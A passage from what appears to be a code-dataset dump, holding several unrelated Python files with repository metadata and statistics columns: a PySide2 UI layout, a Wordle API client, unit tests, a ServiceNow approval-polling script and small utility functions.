name='collection',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='content_management.Collection'),
),
]
| 25.875 | 129 | 0.63124 | 66 | 621 | 5.80303 | 0.621212 | 0.062663 | 0.073107 | 0.114883 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0671 | 0.256039 | 621 | 23 | 130 | 27 | 0.761905 | 0.072464 | 0 | 0.235294 | 1 | 0 | 0.182927 | 0.090592 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1db107f2c1e2018df51dd16f8e25f706a3117779 | 7,945 | py | Python | PyFlow/UI/Widgets/GraphEditor_ui.py | dlario/PyFlow | b53b9d14b37aa586426d85842c6cd9a9c35443f2 | [
"MIT"
] | null | null | null | PyFlow/UI/Widgets/GraphEditor_ui.py | dlario/PyFlow | b53b9d14b37aa586426d85842c6cd9a9c35443f2 | [
"MIT"
] | null | null | null | PyFlow/UI/Widgets/GraphEditor_ui.py | dlario/PyFlow | b53b9d14b37aa586426d85842c6cd9a9c35443f2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'e:/GIT/PyFlow/PyFlow/UI/Widgets\GraphEditor_ui.ui',
# licensing of 'e:/GIT/PyFlow/PyFlow/UI/Widgets\GraphEditor_ui.ui' applies.
#
# Created: Sat May 4 12:25:24 2019
# by: pyside2-uic running on PySide2 5.12.0
#
# WARNING! All changes made in this file will be lost!
from Qt import QtCompat, QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(863, 543)
MainWindow.setDocumentMode(True)
MainWindow.setDockNestingEnabled(True)
MainWindow.setDockOptions(QtWidgets.QMainWindow.AllowNestedDocks|QtWidgets.QMainWindow.AllowTabbedDocks|QtWidgets.QMainWindow.AnimatedDocks)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_3 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_3.setContentsMargins(1, 1, 1, 1)
self.gridLayout_3.setObjectName("gridLayout_3")
self.SceneWidget = QtWidgets.QWidget(self.centralwidget)
self.SceneWidget.setObjectName("SceneWidget")
self.gridLayout = QtWidgets.QGridLayout(self.SceneWidget)
self.gridLayout.setSpacing(2)
self.gridLayout.setContentsMargins(1, 1, 1, 1)
self.gridLayout.setObjectName("gridLayout")
self.widgetCurrentGraphPath = QtWidgets.QWidget(self.SceneWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widgetCurrentGraphPath.sizePolicy().hasHeightForWidth())
self.widgetCurrentGraphPath.setSizePolicy(sizePolicy)
self.widgetCurrentGraphPath.setObjectName("widgetCurrentGraphPath")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widgetCurrentGraphPath)
self.horizontalLayout_3.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.layoutGraphPath = QtWidgets.QHBoxLayout()
self.layoutGraphPath.setSpacing(2)
self.layoutGraphPath.setContentsMargins(-1, 0, -1, 0)
self.layoutGraphPath.setObjectName("layoutGraphPath")
self.horizontalLayout_3.addLayout(self.layoutGraphPath)
self.gridLayout.addWidget(self.widgetCurrentGraphPath, 1, 0, 1, 1)
self.SceneLayout = QtWidgets.QGridLayout()
self.SceneLayout.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.SceneLayout.setObjectName("SceneLayout")
self.gridLayout.addLayout(self.SceneLayout, 4, 0, 1, 1)
self.CompoundPropertiesWidget = QtWidgets.QWidget(self.SceneWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.CompoundPropertiesWidget.sizePolicy().hasHeightForWidth())
self.CompoundPropertiesWidget.setSizePolicy(sizePolicy)
self.CompoundPropertiesWidget.setObjectName("CompoundPropertiesWidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.CompoundPropertiesWidget)
self.gridLayout_2.setContentsMargins(0, 0, 0, 0)
self.gridLayout_2.setObjectName("gridLayout_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setContentsMargins(-1, 0, -1, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_2 = QtWidgets.QLabel(self.CompoundPropertiesWidget)
self.label_2.setObjectName("label_2")
self.horizontalLayout_2.addWidget(self.label_2)
self.leCompoundName = QtWidgets.QLineEdit(self.CompoundPropertiesWidget)
self.leCompoundName.setObjectName("leCompoundName")
self.horizontalLayout_2.addWidget(self.leCompoundName)
self.label = QtWidgets.QLabel(self.CompoundPropertiesWidget)
self.label.setObjectName("label")
self.horizontalLayout_2.addWidget(self.label)
self.leCompoundCategory = QtWidgets.QLineEdit(self.CompoundPropertiesWidget)
self.leCompoundCategory.setObjectName("leCompoundCategory")
self.horizontalLayout_2.addWidget(self.leCompoundCategory)
self.gridLayout_2.addLayout(self.horizontalLayout_2, 0, 0, 1, 1)
self.gridLayout.addWidget(self.CompoundPropertiesWidget, 2, 0, 1, 1)
self.gridLayout_3.addWidget(self.SceneWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menuBar = QtWidgets.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 863, 26))
self.menuBar.setObjectName("menuBar")
MainWindow.setMenuBar(self.menuBar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.dockWidgetNodeView = QtWidgets.QDockWidget(MainWindow)
self.dockWidgetNodeView.setMinimumSize(QtCore.QSize(200, 113))
self.dockWidgetNodeView.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea|QtCore.Qt.LeftDockWidgetArea|QtCore.Qt.RightDockWidgetArea)
self.dockWidgetNodeView.setObjectName("dockWidgetNodeView")
self.dockWidgetContents = QtWidgets.QWidget()
self.dockWidgetContents.setObjectName("dockWidgetContents")
self.verticalLayout = QtWidgets.QVBoxLayout(self.dockWidgetContents)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.scrollArea = QtWidgets.QScrollArea(self.dockWidgetContents)
self.scrollArea.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 198, 475))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout_5.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.propertiesLayout = QtWidgets.QVBoxLayout()
self.propertiesLayout.setObjectName("propertiesLayout")
self.verticalLayout_5.addLayout(self.propertiesLayout)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_5.addItem(spacerItem)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.verticalLayout.addWidget(self.scrollArea)
self.dockWidgetNodeView.setWidget(self.dockWidgetContents)
MainWindow.addDockWidget(QtCore.Qt.DockWidgetArea(1), self.dockWidgetNodeView)
self.toolBar.addSeparator()
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtCompat.translate("MainWindow", "PyFlow", None, -1))
self.label_2.setText(QtCompat.translate("MainWindow", "Name:", None, -1))
self.label.setText(QtCompat.translate("MainWindow", "Category:", None, -1))
self.toolBar.setWindowTitle(QtCompat.translate("MainWindow", "toolBar", None, -1))
self.dockWidgetNodeView.setWindowTitle(QtCompat.translate("MainWindow", "PropertyView", None, -1))
| 60.648855 | 148 | 0.746633 | 739 | 7,945 | 7.975643 | 0.223275 | 0.005429 | 0.004072 | 0.010859 | 0.201222 | 0.158466 | 0.109942 | 0.084153 | 0.084153 | 0.07058 | 0 | 0.022153 | 0.15343 | 7,945 | 130 | 149 | 61.115385 | 0.854148 | 0.042039 | 0 | 0.051724 | 1 | 0 | 0.057756 | 0.009209 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017241 | false | 0 | 0.008621 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1db11b3357bbf28fcc5549063a419c83717d2922 | 995 | py | Python | computer_wordle.py | AntonKueltz/computer-wordle-client | 5cd88d779f529de2c19b82d599ff478476cb0feb | [
"MIT"
] | null | null | null | computer_wordle.py | AntonKueltz/computer-wordle-client | 5cd88d779f529de2c19b82d599ff478476cb0feb | [
"MIT"
] | null | null | null | computer_wordle.py | AntonKueltz/computer-wordle-client | 5cd88d779f529de2c19b82d599ff478476cb0feb | [
"MIT"
] | 2 | 2022-02-03T01:36:51.000Z | 2022-02-07T20:52:36.000Z | #!/usr/bin/env python3
import api
from urllib.parse import urljoin
GREEN = 'G'
YELLOW = 'Y'
GRAY = '.'
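# Wordle-style feedback characters, presumably as returned by the API:
# G = right letter in the right spot, Y = right letter in the wrong spot,
# '.' = letter not in the word.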
with open('wordlist.txt') as wordlist_file:
wordlist = tuple(line.strip() for line in wordlist_file)
class Game:
def __init__(self):
response = api.start_new_game()
self._game_id = response['game_id']
self._public_game_id = response['public_game_id']
self._current_hint = response['hint']
def current_hint(self):
return self._current_hint
def guess(self, guess):
response = api.make_guess(self._game_id, guess)
return_value = {'guess_response': response['response']}
if 'next_hint' in response:
self._current_hint = response['next_hint']
return_value['next_hint'] = response['next_hint']
return return_value
def status(self):
return api.get_game_status(self._game_id)
def url(self):
return urljoin(api.BASE_URL, f'/game/{self._public_game_id}/')
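
# Minimal usage sketch (assumes the local `api` module is configured with
# valid credentials; the first wordlist entry is just an arbitrary guess).
if __name__ == '__main__':
    game = Game()
    print('hint:', game.current_hint())
    result = game.guess(wordlist[0])
    print('feedback:', result['guess_response'])
    print('spectate at:', game.url())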
| 26.184211 | 70 | 0.654271 | 133 | 995 | 4.578947 | 0.368421 | 0.068966 | 0.049261 | 0.052545 | 0.085386 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0013 | 0.227136 | 995 | 37 | 71 | 26.891892 | 0.790637 | 0.021106 | 0 | 0 | 0 | 0 | 0.130524 | 0.029805 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.076923 | 0.115385 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
1db591283c587148c660788ee47bee65cf843d14 | 693 | py | Python | src/tact/server/websocket.py | wabain/tact | bd95608bebc640e47f31f6d0a403108fe998188d | [
"MIT"
] | null | null | null | src/tact/server/websocket.py | wabain/tact | bd95608bebc640e47f31f6d0a403108fe998188d | [
"MIT"
] | null | null | null | src/tact/server/websocket.py | wabain/tact | bd95608bebc640e47f31f6d0a403108fe998188d | [
"MIT"
] | null | null | null | """Base definitions for the websocket interface"""
import json
from abc import ABC, abstractmethod
class WebsocketConnectionLost(Exception):
pass
class AbstractWSManager(ABC):
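    """Async manager for pushing JSON messages over websocket connections.

    ``send`` JSON-encodes the message with compact separators and delegates
    transport to ``_send_serialized``; concrete subclasses supply
    ``_send_serialized`` and ``close``.
    """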
@abstractmethod
async def send(self, conn_id: str, msg: dict) -> None:
# This is implemented as a separate method primarily for test
# convenience
serialized = json.dumps(msg, separators=(',', ':'))
await self._send_serialized(conn_id, serialized)
@abstractmethod
async def _send_serialized(self, conn_id: str, msg: str) -> None:
raise NotImplementedError
@abstractmethod
async def close(self, conn_id: str):
raise NotImplementedError
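
# A minimal sketch of a concrete manager, assuming an in-memory mapping of
# conn_id -> websocket objects exposing aiohttp-style `send_str`/`close`
# coroutines. Illustrative only; the names below are hypothetical and not
# part of the tact API.
class InMemoryWSManager(AbstractWSManager):
    def __init__(self, connections: dict):
        # Hypothetical registry populated by the connection handler.
        self._connections = connections

    async def send(self, conn_id: str, msg: dict) -> None:
        # Reuse the base class's compact JSON serialization.
        await super().send(conn_id, msg)

    async def _send_serialized(self, conn_id: str, msg: str) -> None:
        try:
            await self._connections[conn_id].send_str(msg)
        except KeyError:
            raise WebsocketConnectionLost(conn_id)

    async def close(self, conn_id: str):
        ws = self._connections.pop(conn_id, None)
        if ws is not None:
            await ws.close()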
| 27.72 | 69 | 0.695527 | 78 | 693 | 6.076923 | 0.551282 | 0.050633 | 0.139241 | 0.082278 | 0.067511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217893 | 693 | 24 | 70 | 28.875 | 0.874539 | 0.168831 | 0 | 0.333333 | 0 | 0 | 0.003515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.133333 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1dca8369ce474af0f5d87fe2a557846435779fc6 | 1,956 | py | Python | tests/test_reader.py | goiosunsw/audacity.py | 899fa99e11e0345f95a563ea3c72b0d98f84e646 | [
"MIT"
] | 1 | 2018-01-05T02:06:04.000Z | 2018-01-05T02:06:04.000Z | tests/test_reader.py | goiosunsw/audacity.py | 899fa99e11e0345f95a563ea3c72b0d98f84e646 | [
"MIT"
] | null | null | null | tests/test_reader.py | goiosunsw/audacity.py | 899fa99e11e0345f95a563ea3c72b0d98f84e646 | [
"MIT"
] | null | null | null | import unittest
import os
import sys
import argparse
import numpy as np
import audacity as aud
print('Module file:')
print(aud.__file__)
SCRIPT_DIR = os.path.split(os.path.realpath(__file__))[0]
PACKAGE_DIR = os.path.realpath(os.path.join(SCRIPT_DIR,'..'))
DATA_DIR = os.path.join(PACKAGE_DIR, 'data')
TEST_FILE_1 = os.path.join(DATA_DIR, 'test-1.aup')
class testReader(unittest.TestCase):
TEST_FILE = TEST_FILE_1
def test_read_data_is_2d(self):
filename = self.TEST_FILE
print('Audio file:')
print(filename)
au = aud.Aup(filename)
data = au.get_data()
assert len(data.shape) == 2
def test_read_channels_have_same_length(self):
filename = self.TEST_FILE
au = aud.Aup(filename)
data = au.get_data()
for ii in range(au.nchannels-1):
assert len(data[ii]) == len(data[ii+1])
def test_nsample_getter_same_as_data(self):
filename = self.TEST_FILE
au = aud.Aup(filename)
lens = au.get_channel_nsamples()
for ii, ll in enumerate(lens):
self.assertEqual(len(au.get_channel_data(ii)), ll)
def test_single_file_len_is_right(self):
filename = self.TEST_FILE
au = aud.Aup(filename)
chno = 0
au.open(chno)
for f, data in zip(au.files[chno], au.read()):
self.assertEqual(f[2]-f[1], len(data)/4)
def main():
global test_file
parser = argparse.ArgumentParser()
parser.add_argument('--input', default='')
parser.add_argument('unittest_args', nargs='*')
args = parser.parse_args()
# TODO: Go do something with args.input and args.filename
# Now set the sys.argv to the unittest_args (leaving sys.argv[0] alone)
sys.argv[1:] = args.unittest_args
if args.input:
print('Changing audio file to '+args.input)
testReader.TEST_FILE = args.input
unittest.main()
if __name__ == '__main__':
main()
| 26.432432 | 75 | 0.644683 | 284 | 1,956 | 4.214789 | 0.327465 | 0.06015 | 0.053467 | 0.066834 | 0.155388 | 0.135338 | 0.135338 | 0.135338 | 0.100251 | 0 | 0 | 0.009315 | 0.231595 | 1,956 | 73 | 76 | 26.794521 | 0.787092 | 0.063906 | 0 | 0.188679 | 0 | 0 | 0.049781 | 0 | 0 | 0 | 0 | 0.013699 | 0.075472 | 1 | 0.09434 | false | 0 | 0.113208 | 0 | 0.245283 | 0.09434 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1dcbbd2677c54b75d412f37ba6ff6de126f5a9fa | 248 | py | Python | tests/test_lightcurve.py | moemyself3/lightcurator | 0848435a170fea1d8979a416068ad88f7d8012a2 | [
"MIT"
] | 2 | 2019-03-20T15:11:22.000Z | 2020-05-31T01:55:03.000Z | tests/test_lightcurve.py | moemyself3/lightcurator | 0848435a170fea1d8979a416068ad88f7d8012a2 | [
"MIT"
] | 18 | 2019-03-20T06:42:17.000Z | 2021-01-24T04:57:08.000Z | tests/test_lightcurve.py | moemyself3/lightcurator | 0848435a170fea1d8979a416068ad88f7d8012a2 | [
"MIT"
] | null | null | null | import unittest
from lightcurator import lightcurve as lc
class TestLightcuratorMethods(unittest.TestCase):
def test_matchcat(self):
cc = lc.matchcat(23)
self.assertEqual(cc, 1)
if __name__ == '__main__':
unittest.main()
| 20.666667 | 49 | 0.709677 | 29 | 248 | 5.758621 | 0.724138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015075 | 0.197581 | 248 | 11 | 50 | 22.545455 | 0.824121 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1dd06073161d1a6fc8153bce35244468454bcf1e | 3,173 | py | Python | lab_2/find_lcs_length_optimized_test.py | alenashuvar/2020-2-level-labs | aa5185fae19b386c741faa8dcff3424872642090 | [
"MIT"
] | 3 | 2020-09-05T16:27:19.000Z | 2021-03-12T12:08:00.000Z | lab_2/find_lcs_length_optimized_test.py | alenashuvar/2020-2-level-labs | aa5185fae19b386c741faa8dcff3424872642090 | [
"MIT"
] | 100 | 2020-09-06T16:36:23.000Z | 2020-12-12T06:18:47.000Z | lab_2/find_lcs_length_optimized_test.py | alenashuvar/2020-2-level-labs | aa5185fae19b386c741faa8dcff3424872642090 | [
"MIT"
] | 62 | 2020-09-06T10:49:43.000Z | 2021-09-10T07:07:53.000Z | """
Tests find_lcs_optimized function
"""
import timeit
import unittest
from memory_profiler import memory_usage
from lab_2.main import find_lcs_length_optimized, tokenize_big_file
class FindLcsOptimizedTest(unittest.TestCase):
"""
Checks for find_lcs_optimized function
"""
def test_find_lcs_length_optimized_ideal_case(self):
"""
Tests that find_lcs_length_optimized
works just fine and not fails with big text
"""
sentence_tokens_first_text = tokenize_big_file('lab_2/data.txt')[:30000]
sentence_tokens_second_text = tokenize_big_file('lab_2/data_2.txt')[:30000]
plagiarism_threshold = 0.0001
actual = find_lcs_length_optimized(sentence_tokens_first_text,
sentence_tokens_second_text,
plagiarism_threshold)
reference_lcs = 3899
almost_equal = 3910
print(f"Actual find_lcs_length_optimized function lcs is {actual}")
print(f"Reference find_lcs_length_optimized function lcs is {reference_lcs}")
self.assertTrue(actual)
self.assertEqual(almost_equal, actual)
def test_find_lcs_length_optimized_quickest_time(self):
"""
Tests that find_lcs_length_optimized
works faster than time reference
"""
reference = 353.6632048700001 * 1.1
sentence_tokens_first_text = tokenize_big_file('lab_2/data.txt')[:30000]
sentence_tokens_second_text = tokenize_big_file('lab_2/data_2.txt')[:30000]
plagiarism_threshold = 0.0001
start_time = timeit.default_timer()
find_lcs_length_optimized(sentence_tokens_first_text,
sentence_tokens_second_text,
plagiarism_threshold)
end_time = timeit.default_timer()
actual = end_time - start_time
print(f"Actual find_lcs_length_optimized function running time is: {actual}")
print(f"Reference find_lcs_length_optimized function running time is: {reference}")
self.assertGreater(reference, actual)
def test_find_lcs_length_optimized_lowest_memory(self):
"""
Tests that find_lcs_length_optimized
works efficiently than given memory reference
"""
reference = 65.69129527698863 * 1.1
sentence_tokens_first_text = tokenize_big_file('lab_2/data.txt')[:30000]
sentence_tokens_second_text = tokenize_big_file('lab_2/data_2.txt')[:30000]
plagiarism_threshold = 0.0001
actual_memory = memory_usage((find_lcs_length_optimized,
(sentence_tokens_first_text,
sentence_tokens_second_text,
plagiarism_threshold)),
interval=2)
actual = sum(actual_memory)/len(actual_memory)
print(f'Actual find_lcs_length_optimized function memory consuming is: {actual}')
print(f'Reference find_lcs_length_optimized function memory consuming is: {reference}')
self.assertGreater(reference, actual)
| 42.306667 | 95 | 0.656792 | 363 | 3,173 | 5.347107 | 0.225895 | 0.064915 | 0.107161 | 0.18135 | 0.683153 | 0.683153 | 0.629057 | 0.588872 | 0.433282 | 0.433282 | 0 | 0.043535 | 0.276079 | 3,173 | 74 | 96 | 42.878378 | 0.80148 | 0.100536 | 0 | 0.347826 | 0 | 0 | 0.183346 | 0.054785 | 0 | 0 | 0 | 0 | 0.086957 | 1 | 0.065217 | false | 0 | 0.086957 | 0 | 0.173913 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1dd87ba8ad5a67a4277d8da50db47d17748918d9 | 2,208 | py | Python | pravash/servicenowplugin/xlr-servicenow-plugin-master/src/main/resources/servicenow/RequestApproval.py | amvasudeva/rapidata | 7b6e984d24866f5cf474847cf462ac628427cf48 | [
"Apache-2.0"
] | null | null | null | pravash/servicenowplugin/xlr-servicenow-plugin-master/src/main/resources/servicenow/RequestApproval.py | amvasudeva/rapidata | 7b6e984d24866f5cf474847cf462ac628427cf48 | [
"Apache-2.0"
] | 7 | 2020-06-30T23:14:35.000Z | 2021-08-02T17:08:05.000Z | pravash/servicenowplugin/xlr-servicenow-plugin-master/src/main/resources/servicenow/RequestApproval.py | amvasudeva/rapidata | 7b6e984d24866f5cf474847cf462ac628427cf48 | [
"Apache-2.0"
] | null | null | null | #
# THIS CODE AND INFORMATION ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS
# FOR A PARTICULAR PURPOSE. THIS CODE AND INFORMATION ARE NOT SUPPORTED BY XEBIALABS.
#
import sys, string, time, traceback
import com.xhaus.jyson.JysonCodec as json
from servicenow.ServiceNowClient import ServiceNowClient
if servicenowServer is None:
print "No server provided."
sys.exit(1)
if tableName is None:
print "No tableName provided."
sys.exit(1)
if content is None:
print "No content provided."
sys.exit(1)
if shortDescription is None:
print "No shortDescription provided."
sys.exit(1)
if description is None:
print "No description provided."
sys.exit(1)
snClient = ServiceNowClient.create_client(servicenowServer, username, password)
contentJSON = content % (shortDescription, description)
sysId = None
content = content % (shortDescription, description)
print "Sending content %s" % content
try:
data = snClient.create_record( tableName, content )
print "Returned DATA = %s" % (data)
print json.dumps(data, indent=4, sort_keys=True)
sysId = data["sys_id"]
Ticket = data["number"]
print "Created %s in Service Now." % (sysId)
print "Created %s in Service Now." % (Ticket)
except Exception, e:
exc_info = sys.exc_info()
traceback.print_exception( *exc_info )
print e
print snClient.print_error( e )
print "Failed to create record in Service Now"
sys.exit(1)
isClear = False
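# Poll the change request's "approval" field until ServiceNow marks it
# approved or rejected, sleeping 5 seconds while it is still pending.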
while ( not isClear ):
try:
data = snClient.get_change_request(tableName, sysId)
status = data["approval"]
print "Found %s in Service Now as %s" % (data['number'], status)
if "approved" == status:
            approval = True
isClear = True
print "ServiceNow approval received."
ticket = data["number"]
elif "rejected" == status:
print "Failed to get approval from ServiceNow"
sys.exit(1)
else:
time.sleep(5)
except:
print json.dumps(data, indent=4, sort_keys=True)
print "Error finding status for %s" % statusField
# End try
# End While
| 27.6 | 98 | 0.688859 | 288 | 2,208 | 5.239583 | 0.381944 | 0.032472 | 0.037111 | 0.043075 | 0.163022 | 0.082174 | 0.049039 | 0.049039 | 0.049039 | 0 | 0 | 0.00579 | 0.217844 | 2,208 | 79 | 99 | 27.949367 | 0.867979 | 0.132699 | 0 | 0.192982 | 0 | 0 | 0.215522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.017544 | 0.052632 | null | null | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ddcb5a365134a0fc6fdd220c36768b3059a205b | 363 | py | Python | rotor_tm_traj/traj/Optimization/entire_path/generate_poly.py | xl2623/RotorTM | 4ef88f1fdb2137ff7f6e7f0acbf9105b99773ed8 | [
"BSD-3-Clause"
] | 1 | 2022-01-10T13:43:11.000Z | 2022-01-10T13:43:11.000Z | rotor_tm_traj/traj/Optimization/entire_path/generate_poly.py | xl2623/RotorTM | 4ef88f1fdb2137ff7f6e7f0acbf9105b99773ed8 | [
"BSD-3-Clause"
] | null | null | null | rotor_tm_traj/traj/Optimization/entire_path/generate_poly.py | xl2623/RotorTM | 4ef88f1fdb2137ff7f6e7f0acbf9105b99773ed8 | [
"BSD-3-Clause"
] | 3 | 2022-01-21T03:04:38.000Z | 2022-01-25T15:05:31.000Z | #! /usr/bin/env python
from math import factorial
import numpy as np
# test passed
def generate_poly(max_exponent,max_diff,symbol):
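    # f[k, i] holds the k-th derivative of t**i evaluated at t = symbol:
    # d^k/dt^k (t**i) = i!/(i-k)! * t**(i-k) when i >= k, and 0 otherwise.
    # Rows index the derivative order, columns the monomial exponent.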
f=np.zeros((max_diff+1, max_exponent+1), dtype=float)
for k in range(max_diff+1):
for i in range(max_exponent+1):
if (i - k) >= 0:
f[k,i] = factorial(i)*symbol**(i-k)/factorial(i-k)
else:
f[k,i] = 0
return f | 24.2 | 55 | 0.663912 | 69 | 363 | 3.391304 | 0.492754 | 0.141026 | 0.068376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020134 | 0.179063 | 363 | 15 | 56 | 24.2 | 0.765101 | 0.090909 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1de5367a1f3c604d3f330ae4e673bd72ff6587fa | 7,651 | py | Python | preprocessing/emotic/load_data_from_numpy.py | GKalliatakis/DisplaceNet | 439bcd5ed4133b040baa107c215170eb963aa343 | [
"MIT"
] | 7 | 2019-05-13T01:49:43.000Z | 2020-02-19T04:16:35.000Z | preprocessing/emotic/load_data_from_numpy.py | GKalliatakis/DisplaceNet | 439bcd5ed4133b040baa107c215170eb963aa343 | [
"MIT"
] | null | null | null | preprocessing/emotic/load_data_from_numpy.py | GKalliatakis/DisplaceNet | 439bcd5ed4133b040baa107c215170eb963aa343 | [
"MIT"
] | 4 | 2019-05-28T16:06:31.000Z | 2020-02-27T09:29:16.000Z | """Python utilities required to load data (image & their annotations) stored in numpy arrays.
Functions `load_numpy_arrays_single_output` & `load_numpy_arrays_emotions_age_only` are deprecated.
Use either the main function `load_data_from_numpy` to load all the applicable arrays
or the supporting `load_annotations_only_from_numpy` instead.
"""
from __future__ import print_function
import numpy as np
def load_data_from_numpy(main_numpy_dir,
verbose = 1):
